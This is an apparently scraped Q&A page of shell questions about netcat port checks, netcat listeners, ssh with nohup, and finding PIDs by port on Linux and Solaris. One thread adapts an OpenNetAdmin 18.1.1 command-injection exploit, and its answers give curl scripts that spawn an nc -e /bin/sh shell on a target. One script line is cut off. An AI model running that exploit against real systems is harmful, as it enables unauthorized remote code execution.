xargs to execute nc to check port - linux

There are a list of hosts and port in a text file in the below format
host1 10000
host2 20000
I want to parallely execute nc to check the port connectivity.
I tried the following command
cat host-port.txt | xargs -n 1 -I ^ -P 5 nc -w 1 -zv ^ |& grep -v succeeded`
but the nc command fails with the help message as below
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [hostname] [port[s]]`
If I copy the string from the file and execute it, it works fine. Not sure what happens when xargs extracts the line ("host port") and pass it to nc

Give a try to this:
cat hosts.txt| xargs -n 2 sh -c 'nc -w 1 -zv $1 $2' argv0
of this script
#!/bin/bash
input=hosts.txt
while IFS=' ' read -r host port
do
echo ${host} ${port}
# nc -w 1 -zv ${host} ${port}
done < "$input"
Just replace the line echo ${host} ${port} with your nc options

Related

Netcat [nc] listen grep ip and disconnect

Is there a way to grep the IP address of the inbound connection and disconnect after a timeout?
If I do
nc -vv -l -p <portnum>
it's connected forever.
$nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-4 Use IPv4 (default)
-6 Use IPv6
-c shell commands as -e; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-A algorithm cast256, mars, saferp, twofish, or rijndael
-k password AES encrypt and ascii armor session
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
I'm trying but I get no result.
My netcat is dated. The nc version number is 1.10
EDIT
#VictorLee gives me some alternatives. I made a thing.
Here there's a little server script that listen and logs every new different access.
If someone want to use or modify I put the code below
#!/bin/bash
unset PIDTMP; rm -rf tmplog.log 2>/dev/null
while true; do
if [[ "$PIDTMP" == "" ]]; then
nc -vv -l -p <YOURPORT> > tmplog.log 2>&1 & PIDTMP=$!;
fi
if [[ "$PIDTMP" != "" ]]; then
if [[ -f tmplog.log ]]; then
thisip="$(cat -v tmplog.log 2> /dev/null | tr -d '\0' | grep -aiv "failed" | grep -ioE -m2 "\\[([0-9]{1,3}\.){3}[0-9]{1,3}\\]" | tail -1 | sed 's/^.\(.*\).$/\1/')" 2> /dev/null
#uncomment if u want output to screen
#if [[ "$thisip" != "" ]]; then cat tmplog.log 2> /dev/null; fi;
fi
if [[ "$thisip" != "" ]]; then
kill $PIDTMP 2>/dev/null
wait $PIDTMP 2>/dev/null; unset PIDTMP;
if [[ "$(grep -rnw log.log -e "$thisip" 2> /dev/null)" == "" ]]; then
echo "$thisip" >> log.log
fi
unset thisip
fi
fi
sleep 2
done
Try this:
nc -vv -l -p <portnum> >>/tmp/nc.log 2>&1 & sleep <timeout>;kill -9 $!
If you want to get the only connection ip, could run this grep -oP "(?<=Connection from \[)[\w\.]*(?=])" /tmp/nc.log, the one line is:
nc -vv -l -p <portnum> >>/tmp/nc.log 2>&1 & sleep <timeout>;kill -9 $!;grep -oP "(?<=Connection from \[)[\w\.]*(?=])" /tmp/nc.log
First collect the nc log to nc.log and force kill the nc progress until the time out, then get the connection ip by grep.

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1
I have to adjust this script so it work for me but I don't get this done.
This is what I have so far:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The output is just:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
I am a bit struggling with the syntax.
What did I do wrong?
This is what you want, if you just need to launch the nc program. The script supposes that the remote machine is a Linux machine, with /bin/bash and nc (netcat) compiled with the -e support
#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
I found a solution that fits:
#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
echo -n "{/bin/sh -i}"; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
done
Just replace the xxx.xxx.xxx.xxx with the target you want to attack and save the script as shell.sh
Now run the script with ./shell.sh and you get an interactive shell on the target system.
To verify that you can now type in pwd or id and check if you was successful.

What's wrong about my script with "ssh + nohup"

I want to execute specific script at remote server by ssh in background.
I found some solution about nohup.
But, nohup is not running without "2>&1"
I want to know what's the difference between existing "2>&1" and not.
nohup needs "2>&1" expression?
(Please understand my bad English)
This is my 'iperf_server.sh' script.
iperf -s -p 1 -w 128K
And, It is my host machine command.
$ ssh [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null &"
$ ssh [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null 2>&1 &"
$ ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null &"
Connection to iperf-server closed.
$ ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_DIR]/iperf_server.sh > /dev/null 2>&1 &"
Connection to iperf-server closed.
This is ps command result in iperf server
# ps -eLf | grep iperf | grep -v grep
# ps -eLf | grep iperf | grep -v grep
00:00:00 sudo -S [HOME_DIR]/iperf_server.sh
00:00:00 sh [HOME_DIR]/iperf_server.sh
00:00:00 iperf -s -p 1 -w 128K
00:00:00 iperf -s -p 1 -w 128K
00:00:00 iperf -s -p 1 -w 128K
# killall iperf
# ps -eLf | grep iperf | grep -v grep
# ps -eLf | grep iperf | grep -v grep
Take the & off the end.
This should do it:
ssh -t [id]#[host] "nohup echo [password] | sudo -S [Home_dir]/iperf_server.sh > /dev/null 2>&1"
By the way this is a huge security risk. Don't echo the password on the command line! If you really want to use a password like this at least do something like cat pwd.txt | sudo -S instead.

Killing a PID which is using a port

I am using below code to kill a process which is using a port number
port = sudo lsof -n -i4TCP:3030 | grep LISTEN | awk '{print $2;}'
if [ ! -z "$port" -a "$port" != " " ]; then
sudo kill "$port"
fi
But it is saying port: command not found. What is causing the issue and how can I fix it.
As it stands,
port = sudo lsof -n -i4TCP:3030 | grep LISTEN | awk '{print $2;}'
attempts to run a command port with parameters = sudo lsof -n -i4TCP:3030 and pipe its output through grep LISTEN and then awk '{print $2;}'.
Use
port=$(sudo lsof -n -i4TCP:3030 | grep LISTEN | awk '{print $2;}')
There's no reason to roll this yourself: fuser on Linux will do it for you in a single command, and much more efficiently:
sudo fuser -n tcp -k 3030
With just one line!
sudo kill `sudo lsof -t -i:3030`

how to get process id attached with particular port in sunos

I am trying to get processes attached with a port 7085 on SunOS. i tried following commands.
netstat -ntlp | grep 7085 didn't return anything
netstat -anop | grep 7085 tried this one also. This switches are not valid in SunOs
I am getting the following output.
#netstat -anop
netstat: illegal option -- o
usage: netstat [-anv] [-f address_family]
netstat [-n] [-f address_family] [-P protocol] [-g | -p | -s [interval [count]]]
netstat -m [-v] [interval [count]]
netstat -i [-I interface] [-an] [-f address_family] [interval [count]]
netstat -r [-anv] [-f address_family|filter]
netstat -M [-ns] [-f address_family]
netstat -D [-I interface] [-f address_family]
The version of SunOS is SunOS 5.10. I believe netstat is the only command can do this.
What is the exact switches for netstat which will give me the process id attached with port?
pfiles /proc/* 2>/dev/null | nawk '
/^[0-9]*:/ { pid=$0 }
/port: 7085$/ { printf("%s %s\n",pid,$0);}'
pfiles /proc/* is retrieving all processes file descriptors details
2>/dev/null is dropping out errors due to transient processes died in the meantime
each line starting with a number followed by a colon reports the process id and details, it is stored in the awk pid variable
when a line ends with the string port: <portnumber> (here is 7085), the corresponding pid variable is displayed.
Note: you need the required privilege(s) to get port information from processes you do not own (root has all privileges).
Have a look on lsof http://linux.about.com/library/cmd/blcmdl8_lsof.htm command.
This command describes which processes are using which file descriptors. Remember that anything on port 7085 will have its own file descriptor which you can use to trace back to the process using it.
I would try something like:
$ lsof -i :7085
Hope it can help.
I got his script from HERE . Log into solaris system. Open vi editor. Go into insert mode. Copy and paste this script. save the file and give the name PCP. Give execute permission. Run this script with -p or -P swithc. It will give an output with the PID, PROCESS Name and Port.
Make sure you need to be in ksh shell to execute it.
PCP is a script that enables administrators to see what open TCP ports are in use on a Solaris system. It maps ports to PIDs and vice versa. It accepts wildcards and will also show at a glance all open ports and their corresponding
PIDs. It is nice script gives a very fine out put. Just try it.
Example:
#pcp -p PORT_NUMBER or #pcp -P PROCESS_ID
#!/usr/bin/ksh
#
# # PCP (PID con Port)
# v1.10 08/10/2010 Sam Nelson sam # unix.ms
#
# If you have a Solaris 8, 9 or 10 box and you can't
# install lsof, try this. It maps PIDS to ports and vice versa.
# It also shows you which peers are connected on which port.
# Wildcards are accepted for -p and -P options.
#
# Many thanks Daniel Trinkle trinkle # cs.purdue.edu
# for the help, much appreciated.
#
i=0
while getopts :p:P:a opt
do
case "${opt}" in
p ) port="${OPTARG}";i=3;;
P ) pid="${OPTARG}";i=3;;
a ) all=all;i=2;;
esac
done
if [ $OPTIND != $i ]
then
echo >&2 "usage: $0 [-p PORT] [-P PID] [-a] (Wildcards OK) "
exit 1
fi
shift `expr $OPTIND - 1`
if [ "$port" ]
then
# Enter the port number, get the PID
#
port=${OPTARG}
echo "PID\tProcess Name and Port"
echo "_________________________________________________________"
for proc in `ptree -a | awk '/ptree/ {next} {print $1};'`
do
result=`pfiles $proc 2> /dev/null| egrep "port: $port$"`
if [ ! -z "$result" ]
then
program=`ps -fo comm= -p $proc`
echo "$proc\t$program\t$port\n$result"
echo "_________________________________________________________"
fi
done
elif [ "$pid" ]
then
# Enter the PID, get the port
#
pid=$OPTARG
# Print out the information
echo "PID\tProcess Name and Port"
echo "_________________________________________________________"
for proc in `ptree -a | awk '/ptree/ {next} $1 ~ /^'"$pid"'$/ {print $1};'`
do
result=`pfiles $proc 2> /dev/null| egrep port:`
if [ ! -z "$result" ]
then
program=`ps -fo comm= -p $proc`
echo "$proc\t$program\n$result"
echo "_________________________________________________________"
fi
done
elif [ $all ]
then
# Show all PIDs, Ports and Peers
#
echo "PID\tProcess Name and Port"
echo "_________________________________________________________"
for proc in `ptree -a | sort -n | awk '/ptree/ {next} {print $1};'`
do
out=`pfiles $proc 2>/dev/null| egrep "port:"`
if [ ! -z "$out" ]
then
name=`ps -fo comm= -p $proc`
echo "$proc\t$name\n$out"
echo "_________________________________________________________"
fi
done
fi
exit 0

Resources